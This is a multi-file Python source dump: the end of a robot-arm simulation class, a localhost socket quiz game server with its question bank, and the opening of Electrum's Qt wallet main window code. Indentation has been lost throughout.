obs1 = self.move_right_to_grasp(pos1, view)
obs2 = self.move_right_to_place(pos2, view)
if reset_arm:
self.set_arm_joint_angles(start_jnts)
self.physics.forward()
return np.r_[obs1, obs2]
# def close(self):
# self.active = False
# if self._viewer is not None and self.use_glew:
# self._viewer.close()
# self._viewer = None
# self.physics.free()
# def seed(self, seed=None):
# pass
# def list_joint_info(self):
# for i in range(self.physics.model.njnt):
# print('\n')
# print('Jnt ', i, ':', self.physics.model.id2name(i, 'joint'))
# print('Axis :', self.physics.model.jnt_axis[i])
# print('Dof adr :', self.physics.model.jnt_dofadr[i])
# body_id = self.physics.model.jnt_bodyid[i]
# print('Body :', self.physics.model.id2name(body_id, 'body'))
# print('Parent body :', self.physics.model.id2name(self.physics.model.body_parentid[body_id], 'body'))
|
Server.py
|
import socket
from threading import Thread
import random
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip_address = '127.0.0.1'
port = 5000
server.bind((ip_address, port))
server.listen()
clients = []
nicknames = []
questions = [
" What is the German word for Cheese? \n a.Mozarella\n b.Cheese\n c.Kase\n d.Chipotle",
" Water boils at 212 Units at which scale? \n a.Fahrenheit\n b.Celsius\n c.Rankine\n d.Kelvin",
" Which sea creature has three hearts? \n a.Dolphin\n b.Octopus\n c.Walrus\n d.Seal",
" Who was the character famous in our childhood rhymes associated with a lamb? \n a.Mary\n b.Jack\n c.Johnny\n d.Mukesh",
" How many bones does an adult human have? \n a.206\n b.208\n c.201\n d.196",
" How many wonders are there in the world? \n a.7\n b.8\n c.10\n d.4",
" What element does not exist? \n a.Xf\n b.Re\n c.Si\n d.Pa",
" How many states are there in India? \n a.24\n b.29\n c.30\n d.31",
" Who invented the telephone? \n a.A.G Bell\n b.John Wick\n c.Thomas Edison\n d.G Marconi",
" Who is Loki? \n a.God of Thunder\n b.God of Dwarves\n c.God of Mischief\n d.God of Gods",
" Who was the first Indian female astronaut ? \n a.Sunita Williams\n b.Kalpana Chawla\n c.None of them\n d.Both of them ",
" What is the smallest continent? \n a.Asia\n b.Antarctic\n c.Africa\n d.Australia",
" The beaver is the national embelem of which country? \n a.Zimbabwe\n b.Iceland\n c.Argentina\n d.Canada",
" How many players are on the field in baseball? \n a.6\n b.7\n c.9\n d.8",
" Hg stands for? \n a.Mercury\n b.Hulgerium\n c.Argenine\n d.Halfnium",
" Who gifted the Statue of Libery to the US? \n a.Brazil\n b.France\n c.Wales\n d.Germany",
" Which planet is closest to the sun? \n a.Mercury\n b.Pluto\n c.Earth\n d.Venus"
]
answers = ['c', 'a', 'b', 'a', 'a', 'a', 'a', 'b', 'a', 'c', 'b', 'd', 'd', 'c', 'a', 'b', 'a']
print("Server has started successfully!")
def clientthread(conn , nickname):
score = 0
conn.send("Welcome to this Quiz Game!".encode('utf-8'))
conn.send("You will receive a question. The answer to that question should be one of a, b, c or d\n".encode('utf-8'))
conn.send("Good Luck!\n\n".encode('utf-8'))
index, question, answer = get_random_question_answer(conn)
print(answer)
while True:
try:
message = conn.recv(2048).decode('utf-8')
if message:
if message.lower() == answer:
score += 1
conn.send(f"Nice! Your score is {score}\n\n".encode('utf-8'))
else:
conn.send("Incorrect answer! Better luck next time!\n\n".encode('utf-8'))
remove_question(index)
index, question, answer = get_random_question_answer(conn)
print(answer)
else:
# An empty message means the client disconnected: clean up and stop this thread.
remove(conn)
remove_nickname(nickname)
conn.close()
break
except Exception as e:
print(str(e))
break
def get_random_question_answer(conn):
random_index = random.randint(0, len(questions) - 1)
random_question = questions[random_index]
random_answer = answers[random_index]
conn.send(random_question.encode('utf-8'))
return random_index, random_question, random_answer
def remove_question(index):
questions.pop(index)
answers.pop(index)
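# Note: questions and answers are module-level lists shared by every client thread, so a pop()
# in one thread can invalidate the index another thread is still holding; per-client copies of
# the lists (or a lock around question selection and removal) would be needed for safe concurrent play.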
def remove(connection):
if connection in clients:
clients.remove(connection)
def remove_nickname(nickname):
if nickname in nicknames:
nicknames.remove(nickname)
while True:
conn, addr = server.accept()
conn.send('NICKNAME'.encode('utf-8'))
nickname = conn.recv(2048).decode('utf-8')
clients.append(conn)
nicknames.append(nickname)
print (nickname + " connected")
new_thread = Thread(target= clientthread,args=(conn , nickname))
new_thread.start()
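# A minimal companion client for this server could look like the sketch below (illustrative
# only, not part of this file; assumes the same host/port and that the first message received
# is the 'NICKNAME' prompt). A real client would also need to handle TCP message coalescing,
# since the welcome text and the first question may arrive in one or several recv() calls.
#
# import socket
# client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# client.connect(('127.0.0.1', 5000))
# if client.recv(2048).decode('utf-8') == 'NICKNAME':
#     client.send('player1'.encode('utf-8'))
# while True:
#     print(client.recv(2048).decode('utf-8'))                  # question / feedback text
#     client.send(input('answer (a/b/c/d): ').encode('utf-8'))  # send the chosen option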
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
from .exception_window import Exception_Hook
from PyQt5.QtWidgets import *
from electrum import keystore, simple_config
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS, NetworkConstants
from electrum.plugins import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh)
from electrum import Transaction
from electrum import util, bitcoin, commands, coinchooser
from electrum import paymentrequest
from electrum.wallet import Multisig_Wallet, AddTransactionException
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.setup_exception_hook()
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 5)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
# todo: update only unconfirmed tx
self.history_list.update()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once the GUI has been initialized, check whether there is anything to announce, since the callback may have fired before the GUI was ready
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if NetworkConstants.TESTNET else "Electrum"
title = '%s %s - %s' % (name, self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
wallet_folder = self.get_wallet_folder()
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
wallet_folder = self.get_wallet_folder()
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# 'Settings'/'Preferences' are reserved menu keywords on macOS; using a different label there as a workaround
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are at least three
num_txns = len(self.tx_notifications)
if num_txns >= 3:
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
total_amount += v
self.notify(_("{} new transactions received: Total amount received in the new transactions {}")
.format(num_txns, self.format_amount_and_units(total_amount)))
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
self.notify(_("New transaction received: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return format_satoshis(fee_rate/1000, False, self.num_zeros, 0, False) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'bits'
if self.decimal_point == 5:
return 'mBTC'
if self.decimal_point == 8:
return 'BTC'
raise Exception('Unknown base unit')
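# Note: decimal_point selects the display unit; with decimal_point == 5, for example, amounts
# held internally in satoshis are shown divided by 10**5, i.e. in mBTC.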
def connect_fields(self, window, btc_e, fiat_e, fee_e):
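# The 'follows' flag below guards against feedback loops: programmatically updating one edit
# fires its textChanged signal, which would otherwise re-enter edit_changed and clobber the
# field the user is actually typing in.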
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return self.create_list_tab(l, l.get_list_header())
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
